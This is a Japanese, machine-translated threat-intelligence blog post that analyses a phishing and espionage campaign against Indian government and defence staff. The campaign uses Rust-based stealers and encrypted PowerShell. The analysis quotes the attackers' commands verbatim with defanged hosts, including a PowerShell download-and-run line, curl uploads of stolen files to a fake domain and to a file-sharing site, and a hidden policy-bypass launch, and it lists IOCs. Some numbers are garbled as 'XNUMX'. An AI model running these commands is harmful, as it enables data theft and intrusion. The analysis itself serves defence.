• 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • Services

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • Solutions
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • Company
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • Resources
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite Blog
営業担当者へ連絡
  • 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • Services

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • Solutions
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • Company
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • Resources
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
ホーム   /  未分類  / インド政府を標的としたオペレーション「RusticWeb」:RustベースのマルウェアからWebサービスの情報流出まで
インド政府を標的としたオペレーション「RusticWeb」:RustベースのマルウェアからWebサービスの流出まで
21 12月 2023

インド政府を標的としたオペレーション「RusticWeb」:RustベースのマルウェアからWebサービスの流出まで

著者 サトウィック・ラム・プラッキ
サトウィック・ラム・プラッキ
未分類

SEQRITE Labs APTチームは、2023年2月以降、インド政府関係者を標的としたフィッシング攻撃キャンペーンを発見しました。また、XNUMX月には防衛分野の政府機関と民間企業の両方が標的となっていることも確認しました。新たなRustベースのペイロードと暗号化されたPowerShellコマンドは、専用のコマンドアンドコントロール(CXNUMX)サーバーではなく、Webベースのサービスエンジンに機密文書を盗み出すために利用されています。攻撃ツールは積極的に変更されており、偽のドメインを使用して悪意のあるペイロードやおとりファイルをホストしています。以下は、このキャンペーンで使用されたドメイン名とサンプルのベイトです。

  • 人事訓練省の IPR フォーム(IAS 職員専用)
  • 陸軍福祉教育協会 (AWES) を模倣した偽のドメイン
  • カイラシュ・サティヤルティ子ども財団によるアッサム州CDRの統計レポート
  • 政府のSSOプラットフォームであるParichayを模倣した別の偽ドメイン
  • 国防軍職員年金基金(DSOP)の推薦フォーム
  • 国防省との四半期ごとの取り組み概要のプレゼンテーション

このキャンペーンは次のように追跡されます オペレーション・ラスティックウェブ複数のTTPがパキスタン関連のAPTグループと重複している – トランスペアレント トライブ (APT36)と サイドコピーオペレーションとの類似点もあります アーマーピアサー シスコが2021年に発表した報告書とESSAによる標的 奨学金用紙 AWES は、同じ年に私たちのチームによって観測されました。

脅威アクターは、よく知られたコンパイル言語からGolang、Rust、Nimといった新しい言語へと移行し始めています。これにより相互互換性が確保されると同時に、検出も困難になります。私たちのチームが分析したGolangマルウェアの最近の例としては、Windowsベースのものが挙げられます。 ワープ マルウェア エコシステム TelegramボットをC2として使い、Linuxベースのステージャーペイロード アレスラット同時に、さまざまなランサムウェア(RaaS)オペレーターが、メモリの安全性を確保しながら高性能な暗号化と回避速度を提供するため、GolangからRustに移行しています。

感染チェーン1

最初に確認された感染は、ファイルシステムの列挙に使用されるRustベースのペイロードに大きく依存していました。悪意のあるショートカットファイルが感染を開始し、AWESの偽ドメインを利用してこれらのペイロードをドロップし、ファイル共有ウェブサービスにデータを流出させます。

図1 – 感染連鎖(1)

攻撃者はスピアフィッシングで被害者をターゲットにし、「IPR_2023-24」。このファイルには、二重拡張子形式を用いてPDFファイルを装ったWindowsショートカットファイルが含まれています。コメント名から、このおとりはIPR関連のフォームであることが示唆されます。

図2 – 悪意のあるショートカットファイル

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep バイパス -nop -c “iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\Documents\file.ps1; & $env:USERPROFILE\Documents\file.ps1”

これを開くとPowerShellが起動し、 rb[.]gy 無料のURL短縮サービス「domain」。プロファイルなしの実行ポリシーをバイパスするためのコマンドラインパラメータは、Invoke-WebRequestを使用してPS1スクリプトをダウンロードする際に使用されます。

犠牲者

短縮URLに基​​づいて、クリック数とクリック元の国に関する統計情報をトラッカーで確認できます。キャンペーンは26.53月末に開始され、XNUMX月には多くのアクティビティが見られ、そのうちXNUMX%はインドからのものでした。これは確認された被害者の属性を反映したものではありませんが、標的となった被害者の概要を示しています。

図3 – 被害者学

PowerShell ステージ

展開されたURLは、 awesscholarship[.]in PowerShellスクリプトを取得して保存する (ファイル.ps1) に選出しました。 ドキュメント フォルダ。このスクリプトを確認する前は、ドメイン名は「陸軍福祉教育協会」の奨学金のように見えますが、この組織の正当なドメインは 奨学金[.]awesindia[.]com, 過去にも同様のフィッシングキャンペーンが確認されています。この偽ドメインのページを開くと、AWESの公式ページにリダイレクトされ、以下に示すように公式の警告通知が表示されます。

図4 – 偽ウェブサイトに関する公式通知

PowerShellスクリプトは、ルアー文書と共に後続ステージのペイロードをダウンロードするためのURLパスの設定から始まります。ファイルのダウンロードとアップロードのターゲットパスが設定され、主にこれらの機能のために3つの関数が定義されています。

図5 – PowerShellスクリプト

X関数とY関数は、それぞれファイルにメッセージを記録したり、指定されたURLからターゲットパスにファイルをダウンロードしてログに記録したりするために使用されます。ターゲットの場所はデフォルトで ドキュメント という新しいフォルダが作成されたディレクトリ ダウンロード おとりの PDF ファイルとアーカイブをフォルダーの横にドロップするように作成されます。

図6 – PowerShellスクリプト(続き)

デコイが開かれると、拡張子のない単一のファイルを含むアーカイブファイルが抽出されます。このファイルはEXE拡張子を追加して名前が変更され、実行されます。最後に、Z関数を使用してログファイルをサーバーにアップロードします。 curl コマンドを実行し、記録されたログを削除します。

図7 – アップロードされたログファイル

一方、開かれたおとりファイルは、不動産申告書の様式であり、そのサービスには「インド行政サービスインド政府の様々なポータルサイトには、同様のフォームが複数公開されています。ただし、この空白のIPRフォームは、インド人事訓練省(DoPT)のウェブサイトから入手できます。 ウェブサイト インド人事省の苦情・年金局が管轄するものです。これは陸軍個人申請書に記載されているESSA(教育奨学金制度)とは一切関係ありませんのでご注意ください。

図8 – デコイ:IAS職員向けIPRフォーム(23年XNUMX月)

ダウンローダー: システムチェック段階

EXEペイロードは、PDBパスにある基本的なシステム情報をチェックするRustでコンパイルされたバイナリであることが判明しました - 'syscheck.pdbIDA Proプラグインを使用してRust関数名をデマングリングすると、多くの書き込み関数とコマンド実行関数が呼び出されていることがわかります。この関数は、以下の方法で情報を取得します。

  • ドメイン ifconfig[.]me IPアドレスを取得する
  • 被害者のシステムに存在するアクティブなドライブを取得するためのWMICコマンド – 「wmic 論理ディスク キャプションの取得"。

図9 – システムチェックログ

これらのログは「マイシステム.txt' プログラムデータ\syscheck ディレクトリに保存され、次のドメインにアップロードされます:

「curl -F TT=@C:\ProgramData\syscheck\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php」 

図10 – 次のステージをダウンロードするためのURL

次に別のアーカイブ ファイル1.zip 同じ偽ドメインからダウンロードされ、解凍されます。ファイル名は「マイシステム.exe' を実行し、最後に 持続性 この最終的なペイロードはスタートアップ ディレクトリを通じて作成されます。

図11 – スタートアップによる永続化

スティーラー:最終ステージ

最後のペイロードは、Rustベースのマルウェアで、ファイルを窃取し、システム名とIPアドレスを収集し、ログと共に個々のファイルをアップロードします。Webブラウザ、Discord/Steam、暗号通貨ウォレットからの窃取といった高度な情報窃取マルウェアに見られる機能は備えていません。今回のキャンペーンでは、このスティーラーの複数のバージョンが発見され、コンパイルタイムスタンプは9月から現在(12月)まで様々です。これらのバージョンはVirus Totalでの検出率が著しく低くなっています。

MD5 コンパイルタイムスタンプ PDB
da745b60b5ef5b4881c6bc4b7a48d784 2023-09-26 syscheck.pdb
f68b17f1261aaa4460d759d95124fbd4 2023-09-26 alam.pdb
237961bbba6d4aa2e0fae720d4ece439 2023-10-26 alam.pdb
d2949a3c4496cb2b4d204b75e24390d9 2023-12-08 Zew.pdb
fc61b985d8c590860f397d943131bfb5 2023-12-11 Zew.pdb

91 月と XNUMX 月のサンプルでは PDB パス名の変更が見られますが、BinDiff で比較すると、いくつかの小さな変更を除いて類似性はほぼ同じで、XNUMX% です。

図12 – サンプルの類似性

ダウンローダー段階で取得したすべてのドライブ内のすべてのドキュメントとアーカイブファイルを列挙します。新しいフォルダ内に、異なる名前の2つのログファイルが作成されます(マイクロ、ファイル)の各サンプルについて ProgramData ディレクトリ。アップロードされたファイルの記録と列挙されたファイルのログを保存するために使用されます。列挙されたファイルを「Logs.txt、' 各ファイルは、 curl PUTメソッド oshi[.]at ドメイン、匿名のパブリックファイル共有エンジンと呼ばれる 押上アップロード.

「curl -TC:\Users\test\Downloads\ .zip hxxps://oshi[.]at” 

デスクトップ名とともに、これらのファイルをダウンロードするためのリンクは「記録.txt、' には、各ファイルごとに3つのURLが含まれています。2つはクリアネットリンクで、1つは管理用、もう1つはダウンロード用です。3つ目は、隠しサービス経由でダウンロードするための Oshi の Tor ドメインです。

図13 – アップロードされたファイルのダウンロードリンク

管理ページには、アップロードされたファイルの属性(ダウンロードリンク、サイズ、タイプ、ハッシュ、タイムスタンプ)が表示されます。ファイルの破棄オプションと有効期限タイマーも用意されています。

図14 – アップロードされたファイルの管理ページ

ファイル名にタイムスタンプが含まれたログファイルが偽のAWESドメインにアップロードされます。サーバーの応答がアップロード成功の検証後、サーバーは中断されるまで無期限にスリープ状態になります。

図15 – ログアップロード後のサーバー応答

12月に確認された新たなスティーラーペイロードでは、脅威アクターはKailash Satyarthi Children's Foundationが所有する新たなおとり文書を利用しています。この文書は、 ウェブサイトこれは「アッサムにおける児童婚および児童に対するその他の犯罪」に関する統計報告書に関連しています。

図16 – デコイ:アッサムCDR(23年XNUMX月)

スピアフィッシング攻撃で、陸軍の子供や IAS 職員のための子供財団や児童協会をテーマとしたおとりメールを使用していることは、インド政府関係者、特に子供財団や児童協会に関係する関係者を狙った標的型の攻撃であることを示しています。

感染チェーン2

12月には、マルドキュメントを用いた同様の感染チェーンが観測されました。このチェーンでは、Rustベースのペイロードではなく、PowerShellスクリプトを用いて列挙と情報抽出が行われていました。このチェーンでは、2つの偽ドメインに加え、暗号化されたPowerShellスクリプトが使用されていました。

図17 – 感染連鎖(2)

感染は、悪意のあるVBAマクロを含むフィッシング不正ドキュメントから始まります。基本的なVBA難読化により、暗号化されたPowerShellコマンドが含まれています。わずかに改変されたPSコマンドを使用する同様の不正ドキュメントも確認されています。

  1. Dsop_Nom.ppam
  2. DSOP-NOM.ppam
  3. PM_INDIG_INITIATIVE_BRIEF.ppam

図18 – 悪意のあるVBAマクロ

暗号化された PowerShell

文書を開くと、数字が「パワーシェル'. PowerShellコマンドには暗号化されたデータが含まれており、'を使用してSecureStringに変換されます。ConvertTo-SecureString' をキーで復号します。これは、PowerShell の復号方法と似ています。 エモット ただし、若干の難読化が加わります。

図19 – 暗号化および難読化されたPowerShellコマンド

最初のmaldocでは、変換された文字列は マーシャル 内蔵のDPAPIを介して復号化を管理するメモリオブジェクトを使用してコマンドを呼び出す セキュア文字列からグローバルアロケーションユニコードへ 2番目の方法は、 PSCredentials オブジェクトを使ってプレーンテキスト文字列を取得します。最後の例では、 PtrToStringBSTR の三脚と セキュア文字列をBSTRに変換する は、 マーシャル オブジェクト。難読化のために、コマンドは 難読化の呼び出し 環境変数を使用して IEX コマンドのトリガーをマスクするには:

図20 – 難読化されたIEXコマンド

完全に復号されたPowerShellコマンドを見ると、おとりファイルと次の段階のPowerShellスクリプトがダウンロードされていることがわかります。これらはドメインから ダウンロード の三脚と ドキュメント ディレクトリを作成して実行します。

図21 – デコードされたコマンド(1)

 

図22 – デコードされたコマンド(2)

ドメインとデコイ

最初のシナリオはドメイン「parichay.epar[.]in,一方、2つ目の偽ドメインは、最初の感染チェーンで確認されたものと同じAWESの偽ドメインを使用しています。これは、政府の公式ウェブサイトを模倣した、悪意のあるペイロードをホストするために使用される別の偽ドメインです。parichay.nic[.]inこれは、単一の認証フレームワークの下でユーザーをオンボーディングするために設計された政府SSOプラットフォームです。パリチャイ氏は、政府職員が「ユーザー部門」と政府のメールアドレス(@nic.in/@gov.in)に基づいて様々なNICサービスにアクセスすることを承認する一方、ジャン・パリチャイ氏は、市民が市民中心のサービスにアクセスすることを承認します。

図23 – 正規のParichayドメインと偽のParichayドメイン

最初のデコイは、国防会計局が担当するDSOP(国防軍職員積立基金)の申請フォームに関するものです。2つ目のデコイは、国防省との四半期報告書に関するプレゼンテーションに関するものです。

図24 – デコイ:国防軍職員積立基金(DSOP)

図25 – デコイ:国防省

次の段階のPowerShellスクリプト「メールチェック.ps1ドロップされたスクリプトも同様に暗号化され、難読化されています。復号されたスクリプトを見ると、まずアーカイブファイルをダウンロードして解凍し、その中に「syscheck.exe。このペイロードの永続性を確立するために、スタートアップ フォルダーに直接抽出されます。

図26 – 復号後にドロップされたPowerShellスクリプト

列挙と抽出

バイナリは別のPDB名を持つ別のRustベースのペイロードです。 「Aplet.pdb」です。 コンパイラのタイムスタンプは14月XNUMX日で、シスコの名前が付けられています。 AnyConnect Webヘルパー 署名された証明書付き。

図27 – WebHelper証明書付きバイナリ

列挙と抽出を直接実行する代わりに、PowerShellスクリプトをドロップします。sys.ps1'に ピクチャー ユーザー名を取得した後、この目的のためにディレクトリを作成します。実行されるコマンドは次のとおりです。

「powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\test\Pictures\sys.ps1」

列挙中に 3 つのフォルダーを除外します。 Windows そして、プログラムファイル' ディレクトリ。13 種類のファイル形式のみがリストに含まれています: ('.ppt'、'.pptx'、'.pdf'、'.xlsx'、'.xlsm'、'.xls'、'.xlam'、'.doc'、'.docx'、'.docm'、'.txt'、'.dot'、'.ppam') 各ファイルは 'パス.txt' ドキュメント フォルダにコピーします。

図28 – 列挙と抽出

アップロードされると oshi[.]atダウンロードURLは「suc_logs.txtキャンペーン1と同様です。このスクリプトは無限ループで実行され、新しいファイルが作成されたかどうかを確認します。これらのURLログは、一定期間後に定期的にアップロードされます。

 図29 – ログのアップロード

一方、親バイナリ(システムチェック)は、中断されない限り無限スリープ状態になります。中断された場合は、終了する代わりに、URLログをOshiに再度アップロードします。さらに、今回はバックアップ対策として、firebaseioのサブドメインにもアップロードします。

図30 – 認証付きでFirebaseioにアップロード

Firebase Realtime Databaseは、クラウドホスト型のNoSQLデータベースで、リアルタイムでデータを保存・同期できます。Googleが開発したオープンプラットフォームで、クラウドベースのアプリケーション開発者に広く利用されており、脅威アクターがマルウェアなどのマルウェアを展開するきっかけとなっています。 不運なカムラン データを盗み出すために。クラウドストレージ、ホスティング、リアルタイムデータベースなど、さまざまな機能を提供します。

結論

新たなフィッシング攻撃が、インド政府関係者を標的に機密文書を盗み出そうとしています。Rustベースのペイロードと暗号化されたPowerShellスクリプトが展開され、文書を列挙し、匿名の公開ファイル共有エンジン「」に流出させています。 押上アップロード 専用のコマンドアンドコントロール(C2)サーバーの代わりに、政府機関を模倣した偽のドメインがXNUMXつとも、このサイバースパイ攻撃における悪意のあるペイロードのホスティングに使用されました。Operation RusticWebは、パキスタンに関連する様々なグループとの類似点があるため、APT脅威との関連性が疑われます。脅威アクターがGolang、Rust、Nimといった新しいコンパイル言語を用いて開発されたマルウェアに移行しているため、慎重に行動し、必要な予防措置を講じて保護を維持することをお勧めします。

SEQRITE保護

  • リンクスティーラー48397
  • PS.スティーラー.48398
  • RustStealer.48408.GC
  • スクリプト.RustStealer.48409
  • Trojan.Ruststealer

MITER ATT&CK

戦略 テクニックID 名前
リソース開発 T1583.001

T1587.001

T1588.002

T1608.001

T1608.005

インフラストラクチャの取得:ドメイン

機能の開発:マルウェア

機能の取得:ツール

ステージ機能:マルウェアのアップロード

ステージ機能: リンクターゲット

初期アクセス T1566.002 フィッシング:スピアフィッシング リンク
実行 T1106

T1129

T1059

T1047

T1204.002

ネイティブAPI

共有モジュール

コマンドおよびスクリプト インタプリタ

Windowsの管理の実装

ユーザーの実行:悪意のあるファイル

固執 T1547.001 レジストリ実行キー / スタートアップ フォルダー
防衛回避 T1027.010

T1036.007

T1140

コマンド難読化

マスカレード: 二重のファイル拡張子

ファイルまたは情報の難読化/デコード

プーケットの魅力 T1016

T1033

T1083

システムネットワーク構成の検出

システム所有者/ユーザーの発見

ファイルとディレクトリの検出

収集 T1005

T1119

ローカルシステムからのデータ

自動収集

コマンドおよび制御 T1105 入力ツール転送
exfiltration T1020

T1567

自動流出

Web サービスを介した漏洩

IOC

MD5 ファイル名
56cb95b63162d0dfceb30100ded1131a IPR_2023-24.pdf.zip
13ee4bd10f05ee0499e18de68b3ea4d5 IPR_2023-24.pdf.lnk
de30abf093bd4dfe6b660079751951c6 DSOP-NOM.ppam
PowerShellの
c9969ece7bb47efac4b3b04cdc1538e5 in.ps1
f14e778f4d22df275c817ac3014873dc In.ps1
501a6d48fd8f80a134cf71db3804cf95 メールチェック.ps1
6d29fc0a73096433ff9449c4bbc4cccc sys.ps1
おとり
a9182c812c7f7d3e505677a57c8a353b Ipr.pdf
f5d8664cbf4a9e154d4a888e4384cb1d abc009.pdf
3ce8dfb3f1bff805cb6b85a9e950b3a2 1.pdf
a696c50dd5d15ba75c9e7f8d3c64997c 1.pdf
アーカイブ
e0102071722a87f119b12434ae651b48
ee8d767069faf558886f1163a92e4009
9f3359ae571c247a8be28c0684678304
b0b6629d35451bcc511c0f2845934c3e
f2501e8b57486c427579eeda20b729fd
20b4eb5787faa00474f7d27c0fea1e4b
635864ff270cf8e366a7747fb5996766
エグゼ
da745b60b5ef5b4881c6bc4b7a48d784
f68b17f1261aaa4460d759d95124fbd4
237961bbba6d4aa2e0fae720d4ece439
d2949a3c4496cb2b4d204b75e24390d9
fc61b985d8c590860f397d943131bfb5
04557782d7017f18ec059fc96d7f2dc8
ドメイン/IP
awesscholarship[.]in
89.117.188[。]126 
parichay.epar[.]in
13.232.102[。]189 
oshi[.]at
alfa-aeafa-default-rtdb.firebaseio[.]com
URLは
hxxps://rb[.]gy/gbfsi
hxxps://awesscholarship[.]in/upload/file.zip
hxxps://awesscholarship[.]in/upload/file1.zip
hxxps://awesscholarship[.]in/upload/in.ps1
hxxps://awesscholarship[.]in/upload/upload.php
hxxps://awesscholarship[.]in/upload/Ipr.pdf
hxxps://awesscholarship[.]in/upload/abc009.pdf
hxxps://awesscholarship[.]in/upload/1.pdf
hxxps://awesscholarship[.]in/upload/DSOP-NOM.zip
hxxps://awesscholarship[.]in/ppam/Mail_Check.ps1
hxxps://awesscholarship[.]in/ppam/syscheck.zip
hxxps://parichay.epar[.]in/Win/1.pdf
hxxps://parichay.epar[.]in/Win/Mail_Check.ps1
PDB
C:\Users\123\Desktop\Syscheck\target\release\deps\syscheck.pdb
C:\Users\123\Desktop\Alam\target\release\deps\alam.pdb
C:\Users\123\Desktop\Aplet\target\release\deps\Aplet.pdb
D:\HOME\DESKTOP NEW DATA\Zew\target\release\deps\Zew.pdb
主催者
C:\ProgramData\syscheck\file.zip
C:\ProgramData\syscheck\MySystem.exe
C:\ProgramData\syscheck\MySystem.txt
C:\ProgramData\Micro\logs.txt
C:\ProgramData\Micro\records.txt
C:\ProgramData\Files\Log.txt
C:\ProgramData\Files\Records.txt
ドキュメント\ダウンロードおよび実行ログ.txt
ドキュメント\ファイル.ps1
ドキュメント\myfile.zip
ドキュメント\解凍されたフォルダー\ファイル.exe
ドキュメント\ダウンロード\myfile.pdf
ドキュメント\paths.txt
ドキュメント\suc_logs.txt
ドキュメント\メール_チェック.ps1
ドキュメント\syscheck.zip
ダウンロード\1.pdf
ピクチャ\sys.ps1
%appdata%\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ\MySystem.exe
%appdata%\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ\syscheck.exe

著者: サトウィック・ラム・プラッキ

 以前の投稿未来を守るのは今です: XDR ソリューションを選択するためのユースケース
次の投稿  リモートランサムウェアの防止方法:簡単な方法
サトウィック・ラム・プラッキ

サトウィック・ラム・プラッキについて

Sathwik Ram Prakkiは、Quick Healのセキュリティラボでセキュリティ研究者として働いています。彼の専門分野は、脅威インテリジェンス、脅威ハンティング、そして…に関する執筆です。

Sathwik Ram Prakkiによる記事 »

関連記事

  • 勧告:中東紛争とサイバー攻撃の激化

    勧告:中東紛争とサイバー攻撃の激化

    2026 年 4 月 6 日
  • ホモグリフ攻撃:サイバー詐欺で類似キャラクターがどのように悪用されるか

    2026 年 3 月 30 日
  • 正規の低レベルツールを武器化する:ランサムウェアはいかにしてアンチウイルス対策を回避するのか

    2026 年 3 月 27 日
注目の著者
  • セクライト
    セクライト

    Seqriteは、エンタープライズ向けサイバーセキュリティソリューションのリーディングプロバイダーです。…

    続きを読む..
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    続きを読む..
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    続きを読む..
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    続きを読む..
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (336) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (50) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) データプライバシー (15) データ保護 (32) データセキュリティ (17) DLP (50) DPDP (14) DPDPA (16) Encryption (16) エンドポイントセキュリティ (110) エンタープライズセキュリティ (18) 悪用する (13) GDPR (13) マルウェア (76) マルウェア分析 (13) マルウェア攻撃 (23) マルウェア攻撃 (12) MDM (27) Microsoft (15) ネットワークセキュリティ (25) パッチ管理 (12) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (30) ransomware攻撃 (30) ransomwareの保護 (14) セクライト (41) Seqrite暗号化 (27) セクライト EPS (33) Seqriteサービス (16) 脅威情報 (14) UTM (34) 脆弱性 (16) ゼロトラスト (13)
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

プロフィール

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • エンドポイント保護
  • エンドポイントの検出と応答
  • モバイルデバイス管理
  • BYOD
  • 拡張された検出と応答
  • ゼロトラストネットワークアクセス
  • Data Privacy
  • オンプレミス
  • エンドポイント保護
  • エンドポイントの検出と応答
  • Data Privacy
  • Platform
  • マルウェア分析プラットフォーム
  • マイクロビジネス
  • SOHOトータルエディション
  • Services
  • 脅威情報
  • デジタルリスク保護サービス(DRPS)
  • ランサムウェア復旧サービス (RRaaS)
  • DPDPコンプライアンス
  • 管理された検出と応答
Resources
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • データプライバシーを理解する
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
お問い合わせ
  • 登記事務所
  • 最寄りのオフィス
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • Seqriteについて
  • リーダーシップ
  • 受賞
  • ニュースルーム
Partner
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約